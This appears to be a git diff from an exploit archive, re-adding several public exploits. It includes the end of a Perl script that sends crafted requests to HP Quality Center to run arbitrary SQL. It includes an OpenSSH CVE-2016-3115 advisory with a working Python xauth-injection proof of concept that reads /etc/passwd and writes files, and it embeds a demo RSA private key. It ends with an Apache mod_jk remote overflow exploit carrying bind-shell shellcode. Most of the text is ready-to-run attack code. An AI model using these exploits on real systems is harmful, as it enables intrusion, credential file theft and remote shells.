"Run SQL\n"; -push @bits, AddString('RunQuery'); -push @bits, "\"0:int:3\""; -push @bits, "\"0:int:$sesid\""; -push @bits, "\"0:int:$psesid\""; -push @bits, AddString($sql); -push @bits, "\"65536:str:0\""; -push @bits, "\"0:int:0\""; -$res = HTTPSending(@bits); -print $res; - -# **** Expect to get Failed to Run Query[ERR_SEP]Messages: -# error here but SQL like INSERT or UPDATE still work. - -#****************************************************************** -# Make password -#****************************************************************** -sub SmolkaEncript { - my $password=shift; - return '' unless($password); - my $cripted='ENRCRYPTED'; - my $base = 'SmolkaWasHereMonSher'; - my $x=0; - for(;$xnew(proto=>'tcp',PeerAddr=>$victim,PeerPort=>$vicport) - or die "Can't connect. $!\n"; - my $header = "POST /qcbin/servlet/tdservlet/TDAPI_GeneralWebTreatment HTTP/1.0\r\n" -. "Content-Type: text/html; charset=UTF-8\r\n" -. "X-TD-ID: " . sprintf("%08X",XTDID($body)). "\r\n" -. "User-Agent: TeamSoft WinInet Component\r\n" -. "Content-Length: " . length($body) . "\r\n" -. "Pragma: no-cache\r\n" -. "\r\n"; - print $sock $header; - print $sock $body; - my $text; - while(!eof($sock)){ - $text .= <$sock>; - } - return $text; -} - -# ********* HPMQCs conststr type ********* -sub AddString { - my $str = shift; - if (length($str)<16){ - return "\"0:conststr:$str\""; - } else { - return '\\' . MakeHex("0:conststr:$str") . "\\0:conststr:$str"; - } - -} -# ********HPMQC uses hex digits in many place ************ -sub MakeHex { - return sprintf("%08x",length(shift)); -} - -# ******************************************************** -# This takes @bits and make big longer string out of it. -# ******************************************************* -sub bits2string { - my @bits=@_; - my $bitno = 0; - my $retstr="{\r\n"; - foreach my $onebit (@bits){ - $retstr .= $bitno++ . ": $onebit,\r\n"; - } - $retstr = substr($retstr,0,-3); - $retstr = $retstr . "\r\n}\r\n"; - return $retstr; -} - -# ************************************************* -# HPMQC useid X-TD-ID header which is sum of all chars -# in body plus number 2301. Could checksum? -# ********************************************** -sub XTDID { - my $total=2301; - my $body = shift; - - for(my $i=0;$inew(proto=>'tcp',PeerAddr=>$victim,PeerPort=>$vicport) + or die "Can't connect. $!\n"; + my $header = "POST /qcbin/servlet/tdservlet/TDAPI_GeneralWebTreatment HTTP/1.0\r\n" +. "Content-Type: text/html; charset=UTF-8\r\n" +. "X-TD-ID: " . sprintf("%08X",XTDID($body)). "\r\n" +. "User-Agent: TeamSoft WinInet Component\r\n" +. "Content-Length: " . length($body) . "\r\n" +. "Pragma: no-cache\r\n" +. "\r\n"; + print $sock $header; + print $sock $body; + my $text; + while(!eof($sock)){ + $text .= <$sock>; + } + return $text; +} + +# ********* HPMQCs conststr type ********* +sub AddString { + my $str = shift; + if (length($str)<16){ + return "\"0:conststr:$str\""; + } else { + return '\\' . MakeHex("0:conststr:$str") . "\\0:conststr:$str"; + } + +} +# ********HPMQC uses hex digits in many place ************ +sub MakeHex { + return sprintf("%08x",length(shift)); +} + +# ******************************************************** +# This takes @bits and make big longer string out of it. +# ******************************************************* +sub bits2string { + my @bits=@_; + my $bitno = 0; + my $retstr="{\r\n"; + foreach my $onebit (@bits){ + $retstr .= $bitno++ . ": $onebit,\r\n"; + } + $retstr = substr($retstr,0,-3); + $retstr = $retstr . "\r\n}\r\n"; + return $retstr; +} + +# ************************************************* +# HPMQC useid X-TD-ID header which is sum of all chars +# in body plus number 2301. Could checksum? +# ********************************************** +sub XTDID { + my $total=2301; + my $body = shift; + + for(my $i=0;$i +Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115 +Version: 0.2 +Date: Mar 3rd, 2016 + +Tag: openssh xauth command injection may lead to forced-command and /bin/false bypass + +Overview +-------- + +Name: openssh +Vendor: OpenBSD +References: * http://www.openssh.com/[1] + +Version: 7.2p1 [2] +Latest Version: 7.2p1 +Other Versions: <= 7.2p1 (all versions; dating back ~20 years) +Platform(s): linux +Technology: c + +Vuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection') +Origin: remote +Min. Privs.: post auth + +CVE: CVE-2016-3115 + + + +Description +--------- + +quote website [1] + +> OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options. +Summary +------- + +An authenticated user may inject arbitrary xauth commands by sending an +x11 channel request that includes a newline character in the x11 cookie. +The newline acts as a command separator to the xauth binary. This attack requires +the server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector. + +By injecting xauth commands one gains limited* read/write arbitrary files, +information leakage or xauth-connect capabilities. These capabilities can be +leveraged by an authenticated restricted user - e.g. one with the login shell +configured as /bin/false or one with configured forced-commands - to bypass +account restriction. This is generally not expected. + +The injected xauth commands are performed with the effective permissions of the +logged in user as the sshd already dropped its privileges. + +Quick-Info: + +* requires: X11Forwarding yes +* bypasses /bin/false and forced-commands +** OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear) +* does not bypass /bin/nologin (as there is special treatment for this) + +Capabilities (xauth): + +* Xauth + * write file: limited chars, xauthdb format + * read file: limit lines cut at first \s + * infoleak: environment + * connect to other devices (may allow port probing) + + +PoC see ref github. +Patch see ref github. + + +Details +------- + +// see annotated code below + + * server_input_channel_req (serverloop.c) + *- session_input_channel_req:2299 (session.c [2]) + *- session_x11_req:2181 + + * do_exec_pty or do_exec_no_pty + *- do_child + *- do_rc_files (session.c:1335 [2]) + +Upon receiving an `x11-req` type channel request sshd parses the channel request +parameters `auth_proto` and `auth_data` from the client ssh packet where +`auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`) +and `auth_data` contains the actual x11 auth cookie. This information is stored +in a session specific datastore. When calling `execute` on that session, sshd will +call `do_rc_files` which tries to figure out if this is an x11 call by evaluating +if `auth_proto` and `auth_data` (and `display`) are set. If that is the case AND +there is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc` +is set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`. +Note that `auth_data` nor `auth_proto` was sanitized or validated, it just contains +user-tainted data. Since `xauth` commands are passed via `stdin` and `\n` is a +command-separator to the `xauth` binary, this allows a client to inject arbitrary +`xauth` commands. + +Sidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted +input as arguments to that script. +Sidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3] + +This is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth +command injection: + + SYNOPSIS + xauth [ -f authfile ] [ -vqibn ] [ command arg ... ] + + add displayname protocolname hexkey + generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata] + [n]extract filename displayname... + [n]list [displayname...] + [n]merge [filename...] + remove displayname... + source filename + info + exit + quit + version + help + ? + +Interesting commands are: + + info - leaks environment information / path + ~# xauth info + xauth: file /root/.Xauthority does not exist + Authority file: /root/.Xauthority + File new: yes + File locked: no + Number of entries: 0 + Changes honored: yes + Changes made: no + Current input: (argv):1 + + source - arbitrary file read (cut on first `\s`) + # xauth source /etc/shadow + xauth: file /root/.Xauthority does not exist + xauth: /etc/shadow:1: unknown command "smithj:Ep6mckrOLChF.:10063:0:99999:7:::" + + extract - arbitrary file write + * limited characters + * in xauth.db format + * since it is not compressed it can be combined with `xauth add` to + first store data in the database and then export it to an arbitrary + location e.g. to plant a shell or do other things. + + generate - connect to : (port probing, connect back and pot. exploit + vulnerabilities in X.org + + +Source +------ + +Inline annotations are prefixed with `//#!` + + +/* + * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found + * first in this order). + */ +static void +do_rc_files(Session *s, const char *shell) +{ +... + snprintf(cmd, sizeof cmd, "%s -q -", + options.xauth_location); + f = popen(cmd, "w"); //#! run xauth -q - + if (f) { + fprintf(f, "remove %s\n", //#! remove - injecting \n auth_display injects xauth command + s->auth_display); + fprintf(f, "add %s %s %s\n", //#! \n injection + s->auth_display, s->auth_proto, + s->auth_data); + pclose(f); + } else { + fprintf(stderr, "Could not run %s\n", + cmd); + } + } +} + +Proof of Concept +---------------- + +Prerequisites: + +* install python 2.7.x +* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x +* make sure `poc.py` + + + Usage: + + path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key + + +poc: + +1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`: + +#PUBKEY line - force commands: only allow "whoami" +#cat /home/user1/.ssh/authorized_keys +command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box + +#cat /etc/passwd +user2:x:1001:1002:,,,:/home/user2:/bin/false + +2. run sshd with `X11Forwarding yes` (kali default config) + +#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d + +3. `forced-commands` - connect with user1 and display env information + +#> python 22 user1 .demoprivkey + +INFO:__main__:add this line to your authorized_keys file: +#PUBKEY line - force commands: only allow "whoami" +#cat /home/user/.ssh/authorized_keys +command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box + +INFO:__main__:connecting to: user1:@host:22 +INFO:__main__:connected! +INFO:__main__: +Available commands: + .info + .readfile + .writefile + .exit .quit + + +#> .info +DEBUG:__main__:auth_cookie: '\ninfo' +DEBUG:__main__:dummy exec returned: None +INFO:__main__:Authority file: /home/user1/.Xauthority +File new: no +File locked: no +Number of entries: 1 +Changes honored: yes +Changes made: no +Current input: (stdin):3 +/usr/bin/xauth: (stdin):2: bad "add" command line +... + +4. `forced-commands` - read `/etc/passwd` + +... +#> .readfile /etc/passwd +DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n' +DEBUG:__main__:dummy exec returned: None +INFO:__main__:root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +... + +5. `forced-commands` - write `/tmp/testfile` + +#> .writefile /tmp/testfile `thisisatestfile` +DEBUG:__main__:auth_cookie: '\nadd 127.0.0.250:65500 `thisisatestfile` aa' +DEBUG:__main__:dummy exec returned: None +DEBUG:__main__:auth_cookie: '\nextract /tmp/testfile 127.0.0.250:65500' +DEBUG:__main__:dummy exec returned: None +DEBUG:__main__:/usr/bin/xauth: (stdin):2: bad "add" command line + +#> ls -lsat /tmp/testfile +4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile + +#> cat /tmp/testfile +\FA65500hi\FA65500`thisisatestfile`\AA + +6. `/bin/false` - connect and read `/etc/passwd` + +#> python 22 user2 user2password +INFO:__main__:connecting to: user2:user2password@host:22 +INFO:__main__:connected! +INFO:__main__: +Available commands: + .info + .readfile + .writefile + .exit .quit + + +#> .readfile /etc/passwd +DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n' +DEBUG:__main__:dummy exec returned: None +INFO:__main__:root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +... +user2:x:1001:1002:,,,:/home/user2:/bin/false +... + +7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100 + +#> generate 8.8.8.8:100 . + +#> tcpdump +IP .42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0 + + +Mitigation / Workaround +------------------------ + +* disable x11-forwarding: `sshd_config` set `X11Forwarding no` +* disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys` + +Notes +----- + +Verified, resolved and released within a few days. very impressive. + +Vendor response: see advisory [5] + +References +---------- + +[1] http://www.openssh.com/ +[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388 +[3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376 +[4] http://linux.die.net/man/1/xauth +[5] http://www.openssh.com/txt/x11fwd.adv +''' + +#!/usr/bin/env python +# -*- coding: UTF-8 -*- +# Author : +############################################################################### +# +# FOR DEMONSTRATION PURPOSES ONLY! +# +############################################################################### +import logging +import StringIO +import sys +import os + +LOGGER = logging.getLogger(__name__) +try: + import paramiko +except ImportError, ie: + logging.exception(ie) + logging.warning("Please install python-paramiko: pip install paramiko / easy_install paramiko / install python-paramiko") + sys.exit(1) + +class SSHX11fwdExploit(object): + def __init__(self, hostname, username, password, port=22, timeout=0.5, + pkey=None, pkey_pass=None): + self.ssh = paramiko.SSHClient() + self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + if pkey: + pkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(pkey),pkey_pass) + self.ssh.connect(hostname=hostname, port=port, + username=username, password=password, + timeout=timeout, banner_timeout=timeout, + look_for_keys=False, pkey=pkey) + + def exploit(self, cmd="xxxx\n?\nsource /etc/passwd\n"): + transport = self.ssh.get_transport() + session = transport.open_session() + LOGGER.debug("auth_cookie: %s"%repr(cmd)) + session.request_x11(auth_cookie=cmd) + LOGGER.debug("dummy exec returned: %s"%session.exec_command("")) + + transport.accept(0.5) + session.recv_exit_status() # block until exit code is ready + stdout, stderr = [],[] + while session.recv_ready(): + stdout.append(session.recv(4096)) + while session.recv_stderr_ready(): + stderr.append(session.recv_stderr(4096)) + session.close() + return ''.join(stdout)+''.join(stderr) # catch stdout, stderr + + def exploit_fwd_readfile(self, path): + data = self.exploit("xxxx\nsource %s\n"%path) + if "unable to open file" in data: + raise IOError(data) + ret = [] + for line in data.split('\n'): + st = line.split('unknown command "',1) + if len(st)==2: + ret.append(st[1].strip(' "')) + return '\n'.join(ret) + + def exploit_fwd_write_(self, path, data): + ''' + adds display with protocolname containing userdata. badchars= + + ''' + dummy_dispname = "127.0.0.250:65500" + ret = self.exploit('\nadd %s %s aa'%(dummy_dispname, data)) + if ret.count('bad "add" command line')>1: + raise Exception("could not store data most likely due to bad chars (no spaces, quotes): %s"%repr(data)) + LOGGER.debug(self.exploit('\nextract %s %s'%(path,dummy_dispname))) + return path + +demo_authorized_keys = '''#PUBKEY line - force commands: only allow "whoami" +#cat /home/user/.ssh/authorized_keys +command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box +''' +PRIVKEY = """-----BEGIN RSA PRIVATE KEY----- +MIIEowIBAAKCAQEAtUaWCq7z5CM7wGH1/2XlNVMy7glVgYCVHjf8BUZo+FypdD69 +9SPu06CZ3e0vSUx5KxlQ7vgU6CtH9nQli53oMy225a/RUGEon/axzVtwTpMnVLqn +PLEUn9zPaCjwwpg/Brhr5+NHc3bm/u/LHmKrEg6IjyWssE16exuhA3G/Teed+NaN +zKR3jVLrmXohc9dp57jYBPLZJ5NSojsd27LjdWnq/PokxwvkQOrOPkhTne+7GRts +U68nW5a99jMSb4bpgqsUsIY0IIsKc1nfzUxonvcXmh+RASIffLCzA0OdQyJ7UrPh +TLw8dVOK2e9zsJYlOYUA6G3rnzq9sNmqe7XdeQIDAQABAoIBAHu5M4sTIc8h5RRH +SBkKuMgOgwJISJ3c3uoDF/WZuudYhyeZ8xivb7/tK1d3HQEQOtsZqk2P8OUNNU6W +s1F5cxQLLXvS5i/QQGP9ghlBQYO/l+aShrY7vnHlyYGz/68xLkMt+CgKzaeXDc4O +aDnS6iOm27mn4xdpqiEAGIM7TXCjcPSQ4l8YPxaj84rHBcD4w033Sdzc7i73UUne +euQL7bBz5xNibOIFPY3h4q6fbw4bJtPBzAB8c7/qYhJ5P3czGxtqhSqQRogK8T6T +A7fGezF90krTGOAz5zJGV+F7+q0L9pIR+uOg+OBFBBmgM5sKRNl8pyrBq/957JaA +rhSB0QECgYEA1604IXr4CzAa7tKj+FqNdNJI6jEfp99EE8OIHUExTs57SaouSjhe +DDpBRSTX96+EpRnUSbJFnXZn1S9cZfT8i80kSoM1xvHgjwMNqhBTo+sYWVQrfBmj +bDVVbTozREaMQezgHl+Tn6G1OuDz5nEnu+7gm1Ud07BFLqi8Ssbhu2kCgYEA1yrc +KPIAIVPZfALngqT6fpX6P7zHWdOO/Uw+PoDCJtI2qljpXHXrcI4ZlOjBp1fcpBC9 +2Q0TNUfra8m3LGbWfqM23gTaqLmVSZSmcM8OVuKuJ38wcMcNG+7DevGYuELXbOgY +nimhjY+3+SXFWIHAtkJKAwZbPO7p857nMcbBH5ECgYBnCdx9MlB6l9rmKkAoEKrw +Gt629A0ZmHLftlS7FUBHVCJWiTVgRBm6YcJ5FCcRsAsBDZv8MW1M0xq8IMpV83sM +F0+1QYZZq4kLCfxnOTGcaF7TnoC/40fOFJThgCKqBcJQZKiWGjde1lTM8lfTyk+f +W3p2+20qi1Yh+n8qgmWpsQKBgQCESNF6Su5Rjx+S4qY65/spgEOOlB1r2Gl8yTcr +bjXvcCYzrN4r/kN1u6d2qXMF0zrPk4tkumkoxMK0ThvTrJYK3YWKEinsucxSpJV/ +nY0PVeYEWmoJrBcfKTf9ijN+dXnEdx1LgATW55kQEGy38W3tn+uo2GuXlrs3EGbL +b4qkQQKBgF2XUv9umKYiwwhBPneEhTplQgDcVpWdxkO4sZdzww+y4SHifxVRzNmX +Ao8bTPte9nDf+PhgPiWIktaBARZVM2C2yrKHETDqCfme5WQKzC8c9vSf91DSJ4aV +pryt5Ae9gUOCx+d7W2EU7RIn9p6YDopZSeDuU395nxisfyR1bjlv +-----END RSA PRIVATE KEY-----""" + + +if __name__=="__main__": + logging.basicConfig(loglevel=logging.DEBUG) + LOGGER.setLevel(logging.DEBUG) + + if not len(sys.argv)>4: + print """ Usage: + + path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key + +""" + sys.exit(1) + hostname, port, username, password = sys.argv[1:] + port = int(port) + pkey = None + if os.path.isfile(password): + password = None + with open(password,'r') as f: + pkey = f.read() + elif password==".demoprivkey": + pkey = PRIVKEY + password = None + LOGGER.info("add this line to your authorized_keys file: \n%s"%demo_authorized_keys) + + LOGGER.info("connecting to: %s:%s@%s:%s"%(username,password if not pkey else "", hostname, port)) + ex = SSHX11fwdExploit(hostname, port=port, + username=username, password=password, + pkey=pkey, + timeout=10 + ) + LOGGER.info("connected!") + LOGGER.info (""" +Available commands: + .info + .readfile + .writefile + .exit .quit + +""") + while True: + cmd = raw_input("#> ").strip() + if cmd.lower().startswith(".exit") or cmd.lower().startswith(".quit"): + break + elif cmd.lower().startswith(".info"): + LOGGER.info(ex.exploit("\ninfo")) + elif cmd.lower().startswith(".readfile"): + LOGGER.info(ex.exploit_fwd_readfile(cmd.split(" ",1)[1])) + elif cmd.lower().startswith(".writefile"): + parts = cmd.split(" ") + LOGGER.info(ex.exploit_fwd_write_(parts[1],' '.join(parts[2:]))) + else: + LOGGER.info(ex.exploit('\n%s'%cmd)) + + # just playing around + #print ex.exploit_fwd_readfile("/etc/passwd") + #print ex.exploit("\ninfo") + #print ex.exploit("\ngenerate :600 .") # generate :port port=port+6000 + #print ex.exploit("\nlist") + #print ex.exploit("\nnlist") + #print ex.exploit('\nadd xx xx "\n') + #print ex.exploit('\ngenerate :0 . data "') + #print ex.exploit('\n?\n') + #print ex.exploit_fwd_readfile("/etc/passwd") + #print ex.exploit_fwd_write_("/tmp/somefile", data="`whoami`") + LOGGER.info("--quit--") diff --git a/platforms/multiple/remote/4093.pl b/platforms/multiple/remote/4093.pl index ebe12790b..fbada0537 100755 --- a/platforms/multiple/remote/4093.pl +++ b/platforms/multiple/remote/4093.pl @@ -1,95 +1,95 @@ -# Apache w/ mod_jk Remote Exploit -# by eliteboy - -use IO::Socket; - -print "***ELiTEBOY*PRESENTZ***APACHE*MOD_JK*REMOTE*EXPLOIT***\n"; - -$target = $ARGV[1]; -if (($#ARGV != 1) || ($target < 1) || ($target > 3)) { - print "Usage: modjkx.pl \n"; - print "1.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.20\n" - ."\tDebian 3.1/4.0*Apache 2.2.4/2.2.3&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n"; - print "2.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.19\n" - ."\tDebian 3.1 Sarge*Apache 2.2.4&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n"; - print "3.\tFreeBSD5.4-RELEASE *** Apache 2.2.4 mod_jk-1.2.20/mod_jk-1.2.19\n"; - exit; -} - -$port = 80; - -### lnx metasploit bindshell code port 2007 -my $lnx_shellcode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". -"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x49". -"\x58\x50\x30\x42\x31\x42\x41\x6b\x41\x41\x59\x41\x32\x41\x41\x32". -"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x69\x79\x37\x41\x6b". -"\x6b\x63\x63\x57\x33\x72\x73\x73\x5a\x76\x62\x32\x4a\x55\x36\x51". -"\x48\x4e\x79\x4e\x69\x38\x61\x6a\x6d\x4f\x70\x7a\x36\x77\x33\x30". -"\x52\x42\x46\x31\x78\x46\x67\x38\x57\x30\x66\x50\x53\x6d\x59\x4b". -"\x51\x32\x4a\x63\x56\x70\x58\x50\x50\x50\x51\x50\x56\x6f\x79\x4b". -"\x51\x7a\x6d\x4f\x70\x48\x30\x65\x36\x4b\x61\x4d\x33\x38\x4d\x4b". -"\x30\x72\x72\x50\x52\x56\x36\x42\x63\x6b\x39\x68\x61\x6e\x50\x33". -"\x56\x68\x4d\x6b\x30\x6d\x43\x70\x6a\x33\x32\x66\x39\x6c\x70\x37". -"\x4f\x58\x4d\x6f\x70\x42\x69\x31\x69\x39\x69\x6e\x50\x74\x4b\x46". -"\x32\x32\x48\x56\x4f\x46\x4f\x64\x33\x62\x48\x35\x38\x56\x4f\x42". -"\x42\x30\x69\x50\x6e\x6b\x39\x4a\x43\x56\x32\x73\x63\x4b\x39\x48". -"\x61\x68\x4d\x6d\x50\x49"; - -### bsd metasploit bindshell code port 5555 -my $bsd_shellcode = -"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff". -"\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49". -"\x49\x49\x51\x5a\x6a\x42\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x52". -"\x42\x41\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50". -"\x75\x59\x79\x53\x5a\x31\x71\x33\x68\x4d\x49\x50\x52\x32\x48\x76". -"\x70\x43\x32\x55\x45\x6f\x43\x6c\x49\x68\x61\x36\x32\x51\x52\x36". -"\x32\x62\x62\x52\x72\x50\x6a\x66\x70\x5a\x6d\x4f\x70\x4f\x69\x6f". -"\x63\x50\x51\x32\x73\x73\x62\x50\x6a\x72\x48\x36\x38\x38\x4d\x4f". -"\x70\x4c\x70\x51\x7a\x68\x4d\x6f\x70\x62\x72\x62\x73\x50\x52\x58". -"\x30\x65\x4e\x5a\x6d\x4d\x50\x6c\x57\x32\x4a\x66\x62\x31\x49\x41". -"\x7a\x41\x4a\x52\x78\x46\x31\x30\x57\x32\x71\x4a\x6d\x4d\x50\x77". -"\x39\x51\x69\x6c\x35\x30\x50\x32\x48\x66\x4f\x56\x4f\x32\x53\x62". -"\x48\x52\x48\x76\x4f\x70\x62\x32\x49\x50\x6e\x4d\x59\x5a\x43\x52". -"\x70\x72\x74\x56\x33\x70\x53\x6e\x50\x47\x4b\x38\x4d\x6b\x30\x42". -"A" x 100; - -$alignment = 4127; - -$|=1; - -if ($target eq 1) { - $shellcode = $lnx_shellcode; - $addr = 0xbffff060; -} - -if ($target eq 2) { - $shellcode = $lnx_shellcode; - $addr = 0xbfffef4c; -} - -if ($target eq 3) { - $shellcode = $bsd_shellcode; - $addr = 0xbfbfe5d5; -} - -$offset = pack('l', $addr); - -$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], - PeerPort => $port, - Proto => 'tcp'); - -$a = "A" x ($alignment-4-length($shellcode)) . $shellcode . $offset; - -print $sock "GET /$a HTTP/1.0\r\n\r\n"; - -while(<$sock>) { - print; -} - -# milw0rm.com [2007-06-22] +# Apache w/ mod_jk Remote Exploit +# by eliteboy + +use IO::Socket; + +print "***ELiTEBOY*PRESENTZ***APACHE*MOD_JK*REMOTE*EXPLOIT***\n"; + +$target = $ARGV[1]; +if (($#ARGV != 1) || ($target < 1) || ($target > 3)) { + print "Usage: modjkx.pl \n"; + print "1.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.20\n" + ."\tDebian 3.1/4.0*Apache 2.2.4/2.2.3&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n"; + print "2.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.19\n" + ."\tDebian 3.1 Sarge*Apache 2.2.4&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n"; + print "3.\tFreeBSD5.4-RELEASE *** Apache 2.2.4 mod_jk-1.2.20/mod_jk-1.2.19\n"; + exit; +} + +$port = 80; + +### lnx metasploit bindshell code port 2007 +my $lnx_shellcode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". +"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x49". +"\x58\x50\x30\x42\x31\x42\x41\x6b\x41\x41\x59\x41\x32\x41\x41\x32". +"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x69\x79\x37\x41\x6b". +"\x6b\x63\x63\x57\x33\x72\x73\x73\x5a\x76\x62\x32\x4a\x55\x36\x51". +"\x48\x4e\x79\x4e\x69\x38\x61\x6a\x6d\x4f\x70\x7a\x36\x77\x33\x30". +"\x52\x42\x46\x31\x78\x46\x67\x38\x57\x30\x66\x50\x53\x6d\x59\x4b". +"\x51\x32\x4a\x63\x56\x70\x58\x50\x50\x50\x51\x50\x56\x6f\x79\x4b". +"\x51\x7a\x6d\x4f\x70\x48\x30\x65\x36\x4b\x61\x4d\x33\x38\x4d\x4b". +"\x30\x72\x72\x50\x52\x56\x36\x42\x63\x6b\x39\x68\x61\x6e\x50\x33". +"\x56\x68\x4d\x6b\x30\x6d\x43\x70\x6a\x33\x32\x66\x39\x6c\x70\x37". +"\x4f\x58\x4d\x6f\x70\x42\x69\x31\x69\x39\x69\x6e\x50\x74\x4b\x46". +"\x32\x32\x48\x56\x4f\x46\x4f\x64\x33\x62\x48\x35\x38\x56\x4f\x42". +"\x42\x30\x69\x50\x6e\x6b\x39\x4a\x43\x56\x32\x73\x63\x4b\x39\x48". +"\x61\x68\x4d\x6d\x50\x49"; + +### bsd metasploit bindshell code port 5555 +my $bsd_shellcode = +"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". 